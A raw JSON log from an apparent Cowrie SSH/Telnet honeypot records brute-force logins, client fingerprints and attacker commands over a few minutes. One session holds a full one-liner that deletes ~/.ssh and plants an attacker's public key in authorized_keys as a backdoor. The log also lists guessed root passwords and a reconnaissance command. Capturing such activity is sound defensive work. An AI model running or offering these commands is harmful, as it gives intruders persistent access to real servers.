{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:31:38.894943Z","src_ip":"45.88.8.215","session":"065448faad81"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:31:38.895619Z","src_ip":"45.88.8.215","session":"065448faad81"}
{"eventid":"cowrie.login.success","username":"root","password":"Kalyan@123","message":"login attempt [root/Kalyan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:31:40.478366Z","src_ip":"45.88.8.215","session":"065448faad81"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:31:40.787721Z","src_ip":"45.88.8.215","session":"065448faad81"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:32:07.666323Z","src_ip":"212.227.125.160","session":"e5ef5d19ee9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48348,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9792a25b55c","protocol":"ssh","message":"New connection: 212.227.235.229:48348 (1.2.3.4:22) [session: f9792a25b55c]","sensor":"my-vps","timestamp":"2025-08-26T03:32:12.985864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:32:12.986763Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:32:14.162636Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.login.success","username":"root","password":"parola123","message":"login attempt [root/parola123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:32:18.315868Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:32:20.717801Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:32:20.719407Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:32:20.720480Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:32:21.849036Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:32:24.186890Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:32:24.187665Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:32:25.264748Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:32:25.265654Z","src_ip":"212.227.235.229","session":"f9792a25b55c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50112,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f2309d2027c","protocol":"ssh","message":"New connection: 212.227.235.229:50112 (1.2.3.4:22) [session: 3f2309d2027c]","sensor":"my-vps","timestamp":"2025-08-26T03:32:26.416201Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:32:26.416979Z","src_ip":"212.227.235.229","session":"3f2309d2027c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:32:27.361520Z","src_ip":"212.227.235.229","session":"3f2309d2027c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41152,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ad90e22091","protocol":"ssh","message":"New connection: 212.227.235.229:41152 (1.2.3.4:22) [session: c1ad90e22091]","sensor":"my-vps","timestamp":"2025-08-26T03:32:35.290486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:32:35.291304Z","src_ip":"212.227.235.229","session":"c1ad90e22091"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:32:35.510780Z","src_ip":"212.227.235.229","session":"3f2309d2027c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:32:35.544602Z","src_ip":"212.227.235.229","session":"c1ad90e22091"}
{"eventid":"cowrie.login.failed","username":"pentaho","password":"pentaho","message":"login attempt [pentaho/pentaho] failed","sensor":"my-vps","timestamp":"2025-08-26T03:32:36.600352Z","src_ip":"212.227.235.229","session":"c1ad90e22091"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:32:37.856576Z","src_ip":"212.227.235.229","session":"c1ad90e22091"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42012,"dst_ip":"1.2.3.4","dst_port":22,"session":"182b8d4491a6","protocol":"ssh","message":"New connection: 212.227.125.160:42012 (1.2.3.4:22) [session: 182b8d4491a6]","sensor":"my-vps","timestamp":"2025-08-26T03:32:50.223880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:32:50.224622Z","src_ip":"212.227.125.160","session":"182b8d4491a6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T03:32:50.479002Z","src_ip":"212.227.125.160","session":"182b8d4491a6"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:32:58.224183Z","src_ip":"212.227.125.160","session":"182b8d4491a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40455,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ba2bf10b7e0","protocol":"telnet","message":"New connection: 212.227.125.160:40455 (1.2.3.4:23) [session: 8ba2bf10b7e0]","sensor":"my-vps","timestamp":"2025-08-26T03:34:01.941015Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54134,"dst_ip":"1.2.3.4","dst_port":22,"session":"23e63a4ff25e","protocol":"ssh","message":"New connection: 212.227.235.229:54134 (1.2.3.4:22) [session: 23e63a4ff25e]","sensor":"my-vps","timestamp":"2025-08-26T03:34:02.537223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:34:02.539174Z","src_ip":"212.227.235.229","session":"23e63a4ff25e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:34:04.397136Z","src_ip":"212.227.235.229","session":"23e63a4ff25e"}
{"eventid":"cowrie.login.failed","username":"amit","password":"amit@123","message":"login attempt [amit/amit@123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:34:05.188647Z","src_ip":"212.227.235.229","session":"23e63a4ff25e"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:34:06.452886Z","src_ip":"212.227.235.229","session":"23e63a4ff25e"}
{"eventid":"cowrie.session.closed","duration":12.605033159255981,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:34:14.545944Z","src_ip":"212.227.125.160","session":"8ba2bf10b7e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58552,"dst_ip":"1.2.3.4","dst_port":22,"session":"71bb14c93e9e","protocol":"ssh","message":"New connection: 212.227.125.160:58552 (1.2.3.4:22) [session: 71bb14c93e9e]","sensor":"my-vps","timestamp":"2025-08-26T03:34:16.204929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:34:16.205625Z","src_ip":"212.227.125.160","session":"71bb14c93e9e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T03:34:16.255717Z","src_ip":"212.227.125.160","session":"71bb14c93e9e"}
{"eventid":"cowrie.login.success","username":"root","password":"Password01!","message":"login attempt [root/Password01!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:34:16.407598Z","src_ip":"212.227.125.160","session":"71bb14c93e9e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:34:16.564786Z","src_ip":"212.227.125.160","session":"71bb14c93e9e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T03:34:16.565616Z","src_ip":"212.227.125.160","session":"71bb14c93e9e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:34:16.617627Z","src_ip":"212.227.125.160","session":"71bb14c93e9e"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:34:16.618846Z","src_ip":"212.227.125.160","session":"71bb14c93e9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56248,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee578d22a066","protocol":"ssh","message":"New connection: 212.227.235.229:56248 (1.2.3.4:22) [session: ee578d22a066]","sensor":"my-vps","timestamp":"2025-08-26T03:35:28.565943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:35:28.566976Z","src_ip":"212.227.235.229","session":"ee578d22a066"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53574,"dst_ip":"1.2.3.4","dst_port":22,"session":"d42222058cb5","protocol":"ssh","message":"New connection: 212.227.235.229:53574 (1.2.3.4:22) [session: d42222058cb5]","sensor":"my-vps","timestamp":"2025-08-26T03:35:35.457760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:35:35.459593Z","src_ip":"212.227.235.229","session":"d42222058cb5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T03:35:35.957604Z","src_ip":"212.227.235.229","session":"d42222058cb5"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:35:43.458321Z","src_ip":"212.227.235.229","session":"d42222058cb5"}
